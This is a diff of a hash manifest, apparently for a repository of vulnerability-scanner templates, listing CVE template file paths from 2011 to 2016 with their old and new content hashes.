-http/cves/2011/CVE-2011-2780.yaml:efa6b4f9427ef93a04ac2f27bdb9a0fd2e1172c2 +http/cves/2011/CVE-2011-2744.yaml:03ab85cc38bad602f3bae9309d6d9e94a3ef8ca6 +http/cves/2011/CVE-2011-2780.yaml:509b32f8c34ec3ac54c7f5d68eca51c8d420f68f http/cves/2011/CVE-2011-3315.yaml:a0377daef14d191981a0f569ca9c7d5816b34809 -http/cves/2011/CVE-2011-4336.yaml:0050da7eb1e0feb9f4448425303adfd4e5d2f874 +http/cves/2011/CVE-2011-4336.yaml:304c44d51a1936102439ea5d3b93753c3048e0ae http/cves/2011/CVE-2011-4618.yaml:43b9dc16cda0cbffcc4ee7b6bfb7390ef291deae http/cves/2011/CVE-2011-4624.yaml:67aec04578dce4d171c7e6a30f6101a4f35537d8 -http/cves/2011/CVE-2011-4640.yaml:e241d8dd7d51e250ff275201546f53c895b22cdd -http/cves/2011/CVE-2011-4804.yaml:37900867edbff4dab45640ea03c99ddd32d3294e -http/cves/2011/CVE-2011-4926.yaml:45bf96a5711d629cd72c7195188deeb6e60429ec -http/cves/2011/CVE-2011-5106.yaml:55198a97f63787823655ca77a3a8975fb10927ff +http/cves/2011/CVE-2011-4640.yaml:a420fc3b17a88aa376e17b9aeeececfcb7a85698 +http/cves/2011/CVE-2011-4804.yaml:b834bce15f99648a9aa69e020e115d9d1743ef0f +http/cves/2011/CVE-2011-4926.yaml:07d0e425cd96d336ea822358a49ff41821a63c3d +http/cves/2011/CVE-2011-5106.yaml:2f518834abd8cddb17b5116bb85f009ddf8cddc2 http/cves/2011/CVE-2011-5107.yaml:6500479dea5a2baa7dda98cf15ac603c80dd88ee http/cves/2011/CVE-2011-5179.yaml:6b1bc0308f5843e6e8214c7689ed7ce2cdd3d067 -http/cves/2011/CVE-2011-5181.yaml:22c587383d3a5d17280ed51aa2116e679a8de4af +http/cves/2011/CVE-2011-5181.yaml:2c742ddf13d80ab9705095f5c04863acf5effc53 http/cves/2011/CVE-2011-5252.yaml:cd6677a2e68a410e579dca0dbfb4b0f6cdd87bee -http/cves/2011/CVE-2011-5265.yaml:fd97bcf2d116719875979e92822176690f3f4598 -http/cves/2012/CVE-2012-0392.yaml:ef81227c1f1e020828855ac0ecd11462bec25e56 -http/cves/2012/CVE-2012-0394.yaml:d655e6c35415f94d6a150d405fd672c9481b408c -http/cves/2012/CVE-2012-0896.yaml:f0ddaeaa9f60edb123404b144d6c9f324f50f571 -http/cves/2012/CVE-2012-0901.yaml:b63a1193885f92b47e5e3efb8dde76f4ad55a6c0 -http/cves/2012/CVE-2012-0981.yaml:60fe3af545af85bc25ab4fd527333593d3bdd45e -http/cves/2012/CVE-2012-0991.yaml:6066f351faa5e380c9624693e9909aa24b6aedac -http/cves/2012/CVE-2012-0996.yaml:b19ab38ebefec4aadd598937841d93b4d33f09ee -http/cves/2012/CVE-2012-1226.yaml:2c3128c37cb7cb9ba8ef97b9776c311191445a58 -http/cves/2012/CVE-2012-1823.yaml:0d3dd8a773dce48c30843ad44a58921844f7445b -http/cves/2012/CVE-2012-1835.yaml:a8e5a8464a31bace69bb1ad4d7af5fa733f76cd7 -http/cves/2012/CVE-2012-2371.yaml:cf289b04f6825c98b1648a45082759e50eafd7da -http/cves/2012/CVE-2012-3153.yaml:9632dbed943428a3ce82bd26243e96bb53e0101f +http/cves/2011/CVE-2011-5265.yaml:3629299c7ab9174df7d8588184536146bc4c9aaf +http/cves/2012/CVE-2012-0392.yaml:e4a19a213ec6890934b32339c1bc1a595f3c5f7e +http/cves/2012/CVE-2012-0394.yaml:3111ae42d043d8619a922208aaa998cae6f28b86 +http/cves/2012/CVE-2012-0896.yaml:6d15a7d9bc6d3be722d5d4ed979998577d8b9ed4 +http/cves/2012/CVE-2012-0901.yaml:cc4676f6b8f1025af8450441cc345d61d191097c +http/cves/2012/CVE-2012-0981.yaml:54410413b227a7979de56f35b31dc2e865f07676 +http/cves/2012/CVE-2012-0991.yaml:08d3cf09600f775ce531adf5e966547525d8b4dc +http/cves/2012/CVE-2012-0996.yaml:84b125282e0096629de4adacc5b9b6e1db7234f3 +http/cves/2012/CVE-2012-1226.yaml:b9aefa26324f852d4d716dbb330845b0d557b935 +http/cves/2012/CVE-2012-1823.yaml:1bc5e1ca0c4b8fbd5170219da23eaacbbd4f5bac +http/cves/2012/CVE-2012-1835.yaml:9ef03cd62c044d41781e930a335d6ea02ebc71dd +http/cves/2012/CVE-2012-2371.yaml:d35fa4dae38879bc87e8c1927beb360c6ca07940 +http/cves/2012/CVE-2012-3153.yaml:4f5f8dd92c3bb79b73f5e096b157fa434d06dade http/cves/2012/CVE-2012-4032.yaml:c433e79a48badc5d9996e22bcd1939ee98401e92 -http/cves/2012/CVE-2012-4242.yaml:22a2db1e049674ce9a241cddca724d6df164a778 +http/cves/2012/CVE-2012-4242.yaml:5702dfb9eb0dc70a806354645d5581b711c44aff http/cves/2012/CVE-2012-4253.yaml:b751e39074389ddfe21a53c9639721af4366933d -http/cves/2012/CVE-2012-4273.yaml:a86195478013f40687e1e95d0404d686d5577af6 -http/cves/2012/CVE-2012-4547.yaml:d254026e048515763754a600a75aab80318b79f5 -http/cves/2012/CVE-2012-4768.yaml:47e9b04288e737da4feb04b2bfa518d08b5ff09b -http/cves/2012/CVE-2012-4878.yaml:1a209a9e0f485e98ea538a5f12236e2fbd943052 -http/cves/2012/CVE-2012-4889.yaml:ca924bbd1d81d3e10dc6e12037c3190790781d1e +http/cves/2012/CVE-2012-4273.yaml:ea232cd1dac8f5f9395da88bf4af057aa5df281f +http/cves/2012/CVE-2012-4547.yaml:1a368b287bf2d7a5cf4e2a8bb2262c9947e345a8 +http/cves/2012/CVE-2012-4768.yaml:816e62117eca9cae9747d85abe513b4c74bb6245 +http/cves/2012/CVE-2012-4878.yaml:adab7b06d1898a824aeb36aedbb3e8ed3794be18 +http/cves/2012/CVE-2012-4889.yaml:5508ad452b4b356da8b934e6de9abc1deae05be4 http/cves/2012/CVE-2012-4940.yaml:0788c7af85578fd5462ba3646fe3a489281a3326 -http/cves/2012/CVE-2012-4982.yaml:febfde4d07a25592322c2273aa598ebb156525f7 -http/cves/2012/CVE-2012-5321.yaml:1d2130d5d440f060ae0ab94968d67eeac764a155 -http/cves/2012/CVE-2012-5913.yaml:a777549e2af1d5d8414457ed84acc26bc5c838cb -http/cves/2012/CVE-2012-6499.yaml:89fce19ebd266bc43de3fd9e017ae5756b7b8c06 -http/cves/2013/CVE-2013-1965.yaml:8b5e0f54c0092616feb89be8ae5f32bfe51b434d -http/cves/2013/CVE-2013-2248.yaml:4c5db1f1374578d914e941409be5132db85ccc7d -http/cves/2013/CVE-2013-2251.yaml:fb41a4a2a7d4bbec2f366b34906f06bcae1605e4 -http/cves/2013/CVE-2013-2287.yaml:fb4e1dd0a619cd3b36c09fa2afcba1ace40c254f +http/cves/2012/CVE-2012-4982.yaml:defe2c394ce76e59123751467989546fdedb477b +http/cves/2012/CVE-2012-5321.yaml:c3c959cd4139018f9dc6d83e0dd48e9ceb5d40cb +http/cves/2012/CVE-2012-5913.yaml:d1292669a7ac4def883f124182b062b202023751 +http/cves/2012/CVE-2012-6499.yaml:44bcad77ce9332946506dce70c593c7407df4982 +http/cves/2013/CVE-2013-1965.yaml:9f5ea4e2ede3e57a760b78bba35df5a25f97b096 +http/cves/2013/CVE-2013-2248.yaml:0f5c75886160f8c45398025d59c33a09cc7555ff +http/cves/2013/CVE-2013-2251.yaml:6451e30038014299e998aa93b46bd63d7b6cef90 +http/cves/2013/CVE-2013-2287.yaml:740ca6d675d5d036e8bb8c442b401f100cd192e1 http/cves/2013/CVE-2013-2621.yaml:b119a307b339c8bdf9fd8de85ac33095943fe5bd -http/cves/2013/CVE-2013-3526.yaml:082084e34e544dd3f6522368383d322d3e8a1384 -http/cves/2013/CVE-2013-3827.yaml:62f9f666f26fca45a7b67fd8e25145dc654a31f9 -http/cves/2013/CVE-2013-4117.yaml:6f60e398938fd7bbea55bb00f26c870f2fc9a4ea -http/cves/2013/CVE-2013-4625.yaml:db3dbe786e631be329ce0f26e764a834f4b59fb9 +http/cves/2013/CVE-2013-3526.yaml:f1bb7a19ec36fb857d7b3e9e40c311b35b8dee10 +http/cves/2013/CVE-2013-3827.yaml:b455050804bef00178fe71c47df37e560c227d62 +http/cves/2013/CVE-2013-4117.yaml:e3af3d8b6e5aa118193d40d0111ce652f62807c3 +http/cves/2013/CVE-2013-4625.yaml:708eebdc6371b8866230b4dbfb68d3bf21b09d12 http/cves/2013/CVE-2013-5528.yaml:b9dd20d30e2aec7bf16c605678c6489ee1d01cea -http/cves/2013/CVE-2013-5979.yaml:c0ba55095893ddb99f67a7b586a22e464a3f1d8d -http/cves/2013/CVE-2013-6281.yaml:9b23501e16d627b3ad7f90298dc28808e1d10341 -http/cves/2013/CVE-2013-7091.yaml:a0b2b05ba87e52009e12c3e617191abadc48ae7a -http/cves/2013/CVE-2013-7240.yaml:9612922eb882db21c01194780dc87a54a606e7fc +http/cves/2013/CVE-2013-5979.yaml:827c8db3d7998dd30cd139dc39662de36bc7199d +http/cves/2013/CVE-2013-6281.yaml:43b0fc6630c8c1c343d4028c0408d9266c4d6025 +http/cves/2013/CVE-2013-7091.yaml:3edf95098b7b7bb53891943a708eddd26a2f5f26 +http/cves/2013/CVE-2013-7240.yaml:b4bd306b198efb89e46f6d280ea28dc091c9da7f http/cves/2013/CVE-2013-7285.yaml:b736c63de6a3a9021e2959f2758b08d4361d2dcd http/cves/2014/CVE-2014-10037.yaml:0ef395d3b049fc99af52a0d7ca44ee7d029b1048 -http/cves/2014/CVE-2014-1203.yaml:0506940edc8033338572826802c8c4b1c877a26e -http/cves/2014/CVE-2014-2321.yaml:ce9c932a5a0075092c059ff300acfdca25707c47 -http/cves/2014/CVE-2014-2323.yaml:db34b03d31565f04ef895024cceb9c94f4e34b87 -http/cves/2014/CVE-2014-2383.yaml:60182a283fc602cd74b0652577d114cc921837a7 -http/cves/2014/CVE-2014-2908.yaml:ba4bad2d7e97fd75e9cb049b5bc2175e4e274b8c -http/cves/2014/CVE-2014-2962.yaml:bda481d04555d454bbc3ecced9906fcaf12801c7 -http/cves/2014/CVE-2014-3120.yaml:3cf0983b299bbdf24b5f1ed3693a8cb0e69783ee +http/cves/2014/CVE-2014-1203.yaml:af8b996d5f9e2adcac4ac435e1654d25e613e918 +http/cves/2014/CVE-2014-2321.yaml:df3f2c107beedfa4774501d2ce5ce1d221fa4ebb +http/cves/2014/CVE-2014-2323.yaml:af8806fdc853257647a4aee490070ec3e11e10ee +http/cves/2014/CVE-2014-2383.yaml:c0890d0099e9e4c4423d441cba21b8da5bf5517f +http/cves/2014/CVE-2014-2908.yaml:34b60804ce981f9c823e9e19caca4e269ba43c8f +http/cves/2014/CVE-2014-2962.yaml:3a364924dde5e4bd3e97684264d29dcd87e502c4 +http/cves/2014/CVE-2014-3120.yaml:f50d3f474c4bb0dbd656c57a48ba61e849486e8c http/cves/2014/CVE-2014-3206.yaml:782be59b3bb32def79865444317569a446583b0a http/cves/2014/CVE-2014-3704.yaml:96b8f5c3d29e4a07cad9c4d0ac5c3f601cf655f0 -http/cves/2014/CVE-2014-3744.yaml:ef82571e3fd9947c935fb978114e323826edf9a6 -http/cves/2014/CVE-2014-4210.yaml:b58d6efe179c70093be240210323d92369e1028e +http/cves/2014/CVE-2014-3744.yaml:e558b2c745e05e4c0025ceac2405b1252ab07d25 +http/cves/2014/CVE-2014-4210.yaml:1da5b0613ac1f2914cd717a6668459eaed6b923f http/cves/2014/CVE-2014-4513.yaml:f773b0ae252939028612a224507f9815e8af7c49 http/cves/2014/CVE-2014-4535.yaml:5ea240904288e526982f8498a054c0f81060814b -http/cves/2014/CVE-2014-4536.yaml:13670cc31689486e90a99f52d3e4885da56764d8 -http/cves/2014/CVE-2014-4539.yaml:afefc3796ac36e4fc8a426d4812d5a385b99c013 +http/cves/2014/CVE-2014-4536.yaml:9a419e33efcbea5baa4f8d653258be1a45b5ac76 +http/cves/2014/CVE-2014-4539.yaml:26b3d086f448e6808ff2d7cc1fcee23ff25dbb31 http/cves/2014/CVE-2014-4544.yaml:9b348c6784b4e52f72f556420bdeebf266b0c266 http/cves/2014/CVE-2014-4550.yaml:d91b194e084d6abcb57601e52751f8de18ac94d4 -http/cves/2014/CVE-2014-4558.yaml:cb86477374d9732e3e105e0a4fa261d2b7b3334a -http/cves/2014/CVE-2014-4561.yaml:e9fd8e8996feb9b722721a71c7e27e362232d5b8 +http/cves/2014/CVE-2014-4558.yaml:32ad362633e7f3c89c17684fa2f0add284cce52f +http/cves/2014/CVE-2014-4561.yaml:bb07a47af2690288b49fe39a07dcbda30fb71b2d http/cves/2014/CVE-2014-4592.yaml:04d3f44b089e28ea1d584bead8b557aee3d12f63 -http/cves/2014/CVE-2014-4940.yaml:4b5a22a6747e632fca14beeda1d57d8cce28d1b5 +http/cves/2014/CVE-2014-4940.yaml:6f2d09cfc92e6e1f5624fa66305e6aef9b93c22e http/cves/2014/CVE-2014-4942.yaml:ca31e2efcd6b8e2593546a1951f70b3a0291d9b6 http/cves/2014/CVE-2014-5111.yaml:41b3e9480d86bc114cc55c99a0fbcc65563b6616 -http/cves/2014/CVE-2014-5258.yaml:1cc78037f6259e242fb49770701c0ca56ec985d9 +http/cves/2014/CVE-2014-5258.yaml:b4097cdbe58cf74d91b4a7249119cb46a186d3d9 http/cves/2014/CVE-2014-5368.yaml:a164c0d868655690541a180330c2ee48979fff2f -http/cves/2014/CVE-2014-6271.yaml:2d2c156a02cf70a6c763bfbfadf468743fd8bf3a -http/cves/2014/CVE-2014-6287.yaml:d00ad93561cbacc4ce47a3ef7ffc4b1ef7e01dde +http/cves/2014/CVE-2014-6271.yaml:91fe47f1efff2e7850a3a9c8408dcaea4b7fcfa1 +http/cves/2014/CVE-2014-6287.yaml:50e85a0a80464d40fe58430414e03d67b11fce10 http/cves/2014/CVE-2014-6308.yaml:aa88544552c7b66b74ede5bf9e0b134edbf863fa -http/cves/2014/CVE-2014-8676.yaml:61f909af6c06fd952f0be4bf979eb4fd506f4646 -http/cves/2014/CVE-2014-8682.yaml:0c494b1f9c0dafc3b160990c57e7223407190531 -http/cves/2014/CVE-2014-8799.yaml:0382dc2bc1fb61ca6f5621db125cd5e130677bcc +http/cves/2014/CVE-2014-8676.yaml:72239c99e43a574291bd68fbbd57a06dd9a48555 +http/cves/2014/CVE-2014-8682.yaml:e1307f41692edd23e6751e01190e7cf2dcc6346d +http/cves/2014/CVE-2014-8799.yaml:55e4235f8b2c2d12d78d809d1a9233f6d3049952 http/cves/2014/CVE-2014-9094.yaml:13aebc2fd2c559c5ee127d7c8ddc0dbb681c84fd http/cves/2014/CVE-2014-9119.yaml:f1cd0ce2c6014b22a0cf943c0ea4a3d58fc147e6 -http/cves/2014/CVE-2014-9180.yaml:2614bec3825e1144f2105f88b5996b4e8d2bd974 -http/cves/2014/CVE-2014-9444.yaml:350cbdc330eaeb16a0632470b3bffbf8f30843ea -http/cves/2014/CVE-2014-9606.yaml:fc9279c8cf3d861813a21ab92fee4eaba58f4348 -http/cves/2014/CVE-2014-9607.yaml:f7c91e2b1302d005ee3e0e09c969c0b03f958d5b -http/cves/2014/CVE-2014-9608.yaml:70eaed8ec9130ff24fd85d03d8ed515ba58d50ff +http/cves/2014/CVE-2014-9180.yaml:15dcee27c96bb39f779c55321c7d133b3a4a11f8 +http/cves/2014/CVE-2014-9444.yaml:8c4ab8aa355b6feda6e04a50176a12666a8e1a66 +http/cves/2014/CVE-2014-9606.yaml:74cc1154e0374f962b3962f9f1ae08cacd632aff +http/cves/2014/CVE-2014-9607.yaml:bae4ee40ea38adab99256ff8810f842a528a02a4 +http/cves/2014/CVE-2014-9608.yaml:a3dffef6553a16a35bd4080bb9c255a1c6dfbeb3 http/cves/2014/CVE-2014-9609.yaml:d421d78b1f69c9f53e2a166d11e80fc8e317204e -http/cves/2014/CVE-2014-9614.yaml:be82a01c22e89dfd05854d99f323f85fb1272fa4 +http/cves/2014/CVE-2014-9614.yaml:01bdb613d35cf22722197f354d046532e5bc41f7 http/cves/2014/CVE-2014-9615.yaml:59a97a7e4a3fc7fa230940a4601b02da8b69371b -http/cves/2014/CVE-2014-9617.yaml:f61655deba876aef1cac555b81daeba2f597f2d3 -http/cves/2014/CVE-2014-9618.yaml:23c7186355dcc8343749533efcbaab73d95de7f0 +http/cves/2014/CVE-2014-9617.yaml:acb0b5cab66249f9b07c789cca09d8c1d51488ce +http/cves/2014/CVE-2014-9618.yaml:fbf5a3a378ae96a0f1ebcd2980f3113549c3af6a http/cves/2015/CVE-2015-0554.yaml:d20883db51faac8ddf1fcf4709e557d1967c7485 -http/cves/2015/CVE-2015-1000005.yaml:fd70d70d204eaef2488cb10a35f8413b452c8148 +http/cves/2015/CVE-2015-1000005.yaml:148ee1bcb93fa4293b5027a83c6cdf252851511b http/cves/2015/CVE-2015-1000010.yaml:080f04e2df67eb050ba392f3bf8ef27a87abdd05 http/cves/2015/CVE-2015-1000012.yaml:c4d338e114a302fa98bf87eb0a3e1255419d74eb -http/cves/2015/CVE-2015-1427.yaml:2d09b43b55f0547ec76a1f0c96c0a766bf82b645 -http/cves/2015/CVE-2015-1503.yaml:ea24b2716928e4a8081b77dc1550e8d174f457bc -http/cves/2015/CVE-2015-1579.yaml:286f1a1f3f288d36e236151507dc5a1786d458ed -http/cves/2015/CVE-2015-1635.yaml:696743e064b04c6ddb7630f02ac7bfa79a58ff0b -http/cves/2015/CVE-2015-1880.yaml:d3e1699c7315a3a9caea1a899b2a61762f6e5e3b +http/cves/2015/CVE-2015-1427.yaml:2052c433e8cec1bcba0a0c0ab79cae38f82b611d +http/cves/2015/CVE-2015-1503.yaml:505b6ad4223db51a89a64d57d71ea57f610162b9 +http/cves/2015/CVE-2015-1579.yaml:79d36985380867eb86b8493525f4df9c4823b2d9 +http/cves/2015/CVE-2015-1635.yaml:7e86c46c0d912d6b56ce0ca101290f9968b7e2be +http/cves/2015/CVE-2015-1880.yaml:bb7698568401bd95647404819705e35b1e7b9c8e http/cves/2015/CVE-2015-20067.yaml:77e222d17ecb3663400b5bb143f2ab56845043b2 http/cves/2015/CVE-2015-2067.yaml:2835680c4edd735249eefa325c2ab2af801136d4 -http/cves/2015/CVE-2015-2068.yaml:3391d599f0dafcde5eba8d662394cafe1ff19ffe -http/cves/2015/CVE-2015-2080.yaml:5dc808f109695b251ab7268e0e293136043baed2 -http/cves/2015/CVE-2015-2166.yaml:71bf7c74e59db0e64e4dc5811d047f7ed9c527e4 -http/cves/2015/CVE-2015-2196.yaml:41c3025eda3b296fadb3afb70e9f44ab5e855a86 -http/cves/2015/CVE-2015-2755.yaml:153c44d93a107d184876d575101a5e3bae6ade75 +http/cves/2015/CVE-2015-2068.yaml:c953242135a61e88df9918d88a563f12a78f7a44 +http/cves/2015/CVE-2015-2080.yaml:c8c1355c24f22a98ecd07ff45b5639045ebbf4c9 +http/cves/2015/CVE-2015-2166.yaml:44a883aee08d308103ab096e203af4147fb63c11 +http/cves/2015/CVE-2015-2196.yaml:978724dc54bb9ae4f534a373d87a67d4538e6858 +http/cves/2015/CVE-2015-2755.yaml:82a0a885cb854fa843400aae700b6189febf8341 http/cves/2015/CVE-2015-2794.yaml:22fea2657bd50593544f2ea1d4e1e61f7044f541 -http/cves/2015/CVE-2015-2807.yaml:a32104390b45df0c648be1124edd91b81a398bd8 +http/cves/2015/CVE-2015-2807.yaml:a227602f43f63d8af4f98cfaf7357fc6d357224c http/cves/2015/CVE-2015-2863.yaml:94f9d4de683bd0f7ed17d5cf945e89a3af50fd0f -http/cves/2015/CVE-2015-2996.yaml:4a148288d459b04645da3f50f3d5ed9f2a569fe9 -http/cves/2015/CVE-2015-3035.yaml:7e9bcc2539eee69c097358692a1fb05cec8af353 -http/cves/2015/CVE-2015-3224.yaml:c3fa9504f5cba20a3037356578c60c6599bf4218 -http/cves/2015/CVE-2015-3337.yaml:23782a8e4f10c0ee363490768863280168caaf09 +http/cves/2015/CVE-2015-2996.yaml:4301c965d3ce4ee88948b11567c53f0c1f649fc3 +http/cves/2015/CVE-2015-3035.yaml:2ff6416b34c58d2f32282653c0b7b5ae4046814f +http/cves/2015/CVE-2015-3224.yaml:313678c50c664b17121e54cff7095002c666217f +http/cves/2015/CVE-2015-3337.yaml:b2ad45e3260bfa0a8120a1f1c0395d06faae88b4 http/cves/2015/CVE-2015-3648.yaml:33e6aa6bb2981bbe6e7798ce23c59f911ab22255 http/cves/2015/CVE-2015-3897.yaml:7e151eb750e3c1602ea9cb1aa3e9a2d68ca31770 -http/cves/2015/CVE-2015-4050.yaml:dc0beb1e5f5a7106fc13e1e7cd483c123cd3bef5 -http/cves/2015/CVE-2015-4062.yaml:f87a6cda00bb59fff638d8bd2d24c5bfef8c54fa +http/cves/2015/CVE-2015-4050.yaml:1fb6c88775ea0bb6994b2e298ee5c8b73719e3c3 +http/cves/2015/CVE-2015-4062.yaml:378f403ff95aa7bee5c65579e5d754b97e63e3e7 http/cves/2015/CVE-2015-4063.yaml:82f243448aa7204d9d610679fb10f817dbb54750 -http/cves/2015/CVE-2015-4074.yaml:065fb740afd3068b6d1e46df88070d26b6ce45e0 -http/cves/2015/CVE-2015-4127.yaml:544be4829bf72ee7d73cc4cb7f47f3fd3f1ae01c +http/cves/2015/CVE-2015-4074.yaml:b5d68e8c21d90b492949a026199011ffa9b7ccb4 +http/cves/2015/CVE-2015-4127.yaml:07a76d863355591fa4bf3161356ac8edebe9ca97 http/cves/2015/CVE-2015-4414.yaml:d62aaf0ccbf4332dd956ee3fa625dfef380e07cd -http/cves/2015/CVE-2015-4455.yaml:c9428c8c8a30af5dfb87b2b89927f3ce1ba7b554 -http/cves/2015/CVE-2015-4632.yaml:d062862654959446af1cb7bdb1e5ff2ff029510e -http/cves/2015/CVE-2015-4666.yaml:846d0baaf39e9f004c072d698ff122871460f68e -http/cves/2015/CVE-2015-4668.yaml:2b4888f257c6dc0cba9ee277c343475ea06da19f -http/cves/2015/CVE-2015-4694.yaml:80d4b715db569ba21691325fc5f2ab037f17d062 +http/cves/2015/CVE-2015-4455.yaml:891c495387a931870d0ceec861fc320c8b076967 +http/cves/2015/CVE-2015-4632.yaml:834457ecf87f6fbc2957118f24eab2f08a922f39 +http/cves/2015/CVE-2015-4666.yaml:d75fda264bca4227d5bed4d82da1aaf9a958c8ae +http/cves/2015/CVE-2015-4668.yaml:a7fd56350c28d37828eb15704a45a4b5d57bf11b +http/cves/2015/CVE-2015-4694.yaml:c66194043edff2b0b26162c69fb40f5245877588 http/cves/2015/CVE-2015-5354.yaml:628f69500fd63d21bb4637dcb719434c1f5aa353 -http/cves/2015/CVE-2015-5461.yaml:98d9a0b63a0e104cd4ea59960c8b3025f454ab93 +http/cves/2015/CVE-2015-5461.yaml:98d8eb40f34b8c6d6d603dd8078a68d86a896f90 http/cves/2015/CVE-2015-5469.yaml:993b7db9108784f0a7abb12ef8b33c5d5c1cc68e -http/cves/2015/CVE-2015-5471.yaml:9420a5c26f7a98952a37310c5bb99e1eb97180a1 -http/cves/2015/CVE-2015-5531.yaml:fd64db7797d56f409149f174b8852d1b3a6c2887 -http/cves/2015/CVE-2015-5688.yaml:694c1bca800b7a0c2fc37ee0ca2504f8390fe5fe +http/cves/2015/CVE-2015-5471.yaml:f73d747097f7021c3ea779182d4317198dfadbbd +http/cves/2015/CVE-2015-5531.yaml:f860f8459f55bfea5bf44d5317a66012a44970dc +http/cves/2015/CVE-2015-5688.yaml:dfdad41c83a97739b7002798c9614018919b5c4f http/cves/2015/CVE-2015-6477.yaml:9255a94059eced9c3b57520ad58ac346f15c8d2b http/cves/2015/CVE-2015-6544.yaml:b3e7f972c791e433d02747d3a2f15e2b93dd5128 http/cves/2015/CVE-2015-6920.yaml:010bca7f3c3d63174ad513216c778c12be764930 -http/cves/2015/CVE-2015-7245.yaml:6e9cbe30f70116bad5ad6c71c89444ee6a7997f3 -http/cves/2015/CVE-2015-7297.yaml:021c4ad5384f1d81394c1b918530645865192610 -http/cves/2015/CVE-2015-7377.yaml:d282abafff78076c75643f69f95bf7d5dc7b5078 -http/cves/2015/CVE-2015-7450.yaml:8e8c91379d5ccc4e75b971b87531f6292d794fed -http/cves/2015/CVE-2015-7780.yaml:12e89bd0bde43516f0d7847e08871137a999baf8 -http/cves/2015/CVE-2015-7823.yaml:9f4f599e8e658f3cf369f118166d82bcaba262c5 +http/cves/2015/CVE-2015-7245.yaml:d7c4caa6aebd858813b48f504170ead93f76c97e +http/cves/2015/CVE-2015-7297.yaml:479397b821556af05d4883e6dec21032e5fa5c7b +http/cves/2015/CVE-2015-7377.yaml:056f3a75cc766de47884ee47bc3475d52de4c5dc +http/cves/2015/CVE-2015-7450.yaml:6fa68acdf9f9b816bc885ea187a929c5f0e1f201 +http/cves/2015/CVE-2015-7780.yaml:158102b86a2ba04cff932be068374b3aa67377c4 +http/cves/2015/CVE-2015-7823.yaml:419b139acb8649df87f9fbdd151b5a4a23674e2f http/cves/2015/CVE-2015-8349.yaml:856790657d418e60710c440179383bf5528db0b6 http/cves/2015/CVE-2015-8399.yaml:88082e1686fa05ae008feb2f2d6a0eeba15d8696 -http/cves/2015/CVE-2015-8813.yaml:270c457316c64ff3991b0c1bf0370820a19edf5c -http/cves/2015/CVE-2015-9312.yaml:ac616d4b93d14c3c824063ec8d69cc652a03c694 -http/cves/2015/CVE-2015-9323.yaml:189fc2bcd1415c764404c143c884d8f294dadc7e +http/cves/2015/CVE-2015-8813.yaml:7c2d2a8feb91d0c4eb7f5133a631276db24e318a +http/cves/2015/CVE-2015-9312.yaml:19fbaca553a825f2ff06036d499b163f79994c04 +http/cves/2015/CVE-2015-9323.yaml:e764a97924ed55cb99181149860192850ef709e2 http/cves/2015/CVE-2015-9414.yaml:44f53443a463d463c575726eec3ff5192b2bcb27 -http/cves/2015/CVE-2015-9480.yaml:b264e3550af7189a4254409797596181dc20e536 -http/cves/2016/CVE-2016-0957.yaml:1e35a4f37a63b1317d63a143785c57d7085079ee -http/cves/2016/CVE-2016-1000126.yaml:7f0cccf2ca739d106795020c3403754d42dcf431 -http/cves/2016/CVE-2016-1000127.yaml:f734f23ae4fb3db3df4dc3b2074e3fc475798176 +http/cves/2015/CVE-2015-9480.yaml:76d467ff7bdd50d5b4b0c6eb8735888258d83aec +http/cves/2016/CVE-2016-0957.yaml:6a4aceb98204ef9b710851d91fde84365704e013 +http/cves/2016/CVE-2016-1000126.yaml:77ea357d95ad88637f6db5ead04573a8af9dcbaf +http/cves/2016/CVE-2016-1000127.yaml:5d4c49411b8f59c68c53286b173ebec38363dbbc http/cves/2016/CVE-2016-1000128.yaml:42f74b0e57adf59effe7e114152a36202d61eb6c http/cves/2016/CVE-2016-1000129.yaml:6a9354109374ffdb6807cff25eb83aaebb9e58a2 http/cves/2016/CVE-2016-1000130.yaml:1f43e1aba00fb7e7bb30af51d831b340e5ab6ba2 -http/cves/2016/CVE-2016-1000131.yaml:eea2050343c4a488fe2504a2bcaf5d8a48bd25d7 +http/cves/2016/CVE-2016-1000131.yaml:3308d2f197f8ef3f8f816b639c48c668ab67ea58 http/cves/2016/CVE-2016-1000132.yaml:cbe226168be37f3644a070a0dd06f39419676b95 -http/cves/2016/CVE-2016-1000133.yaml:d3bc987f042da3ead318724afe55fd95e5b1edf7 +http/cves/2016/CVE-2016-1000133.yaml:543a1628eed4a70ef1bda756d2a452e184632e0a http/cves/2016/CVE-2016-1000134.yaml:09dbf84e0e4ddff69119ae612f2cdf3f21c7675f http/cves/2016/CVE-2016-1000135.yaml:5984d6af6ad7e94cd4dcf61907054f9dfd449c96 http/cves/2016/CVE-2016-1000136.yaml:5ee948fb4f7e2df7f4acf3e1ffdf28e9dfaf5322 -http/cves/2016/CVE-2016-1000137.yaml:9aef7c2f783a467b51a62ed589f6ae59256d8ac1 -http/cves/2016/CVE-2016-1000138.yaml:b68163b0ee38a281652b7901553e8916d329edf4 +http/cves/2016/CVE-2016-1000137.yaml:7992a62d8b0a760dc2745ea2d4bdcff8a8c63dd7 +http/cves/2016/CVE-2016-1000138.yaml:ef4e7b323056e6d946ca47ef4c1a2e2b727d1ab0 http/cves/2016/CVE-2016-1000139.yaml:8b0948303469e93387ad15ba7c7d26ddd0864b29 http/cves/2016/CVE-2016-1000140.yaml:824295a403f50be40c0442f34403855e9a1d472b -http/cves/2016/CVE-2016-1000141.yaml:49313fa387bdf26aa28142f6269df45666b07fae -http/cves/2016/CVE-2016-1000142.yaml:45514d06a481033045795c71716c8059d292a113 +http/cves/2016/CVE-2016-1000141.yaml:7dedcea1a8ad3f4b2f71389036404f164c088465 +http/cves/2016/CVE-2016-1000142.yaml:299e7a60c352c0d7ea4f9a6d75d436f15aab1c13 http/cves/2016/CVE-2016-1000143.yaml:27bb71d021209094b538c07f4f52733dbc941fbd http/cves/2016/CVE-2016-1000146.yaml:0f4feb40b92ac6e9e336bc76a07d46ff7071f845 -http/cves/2016/CVE-2016-1000148.yaml:8bd3a44bd2de1d17a7013a8b4414592d714dd009 -http/cves/2016/CVE-2016-1000149.yaml:e52bed66eebb7a36ce9e4d561b83aab415d74b93 +http/cves/2016/CVE-2016-1000148.yaml:25ba12031468a02dba3afd1911f23c94572dc39e +http/cves/2016/CVE-2016-1000149.yaml:86bc42b8ccb0e878805966b9cbe4a0d876d7f77b http/cves/2016/CVE-2016-1000152.yaml:d94328828fbf18aba5ef94afb0bd4df113377769 http/cves/2016/CVE-2016-1000153.yaml:918980710b38127ac9e1da9cdeb7424b9ee7b74f -http/cves/2016/CVE-2016-1000154.yaml:b9b595a45da1f0abc17a0317966ccf37502f3b32 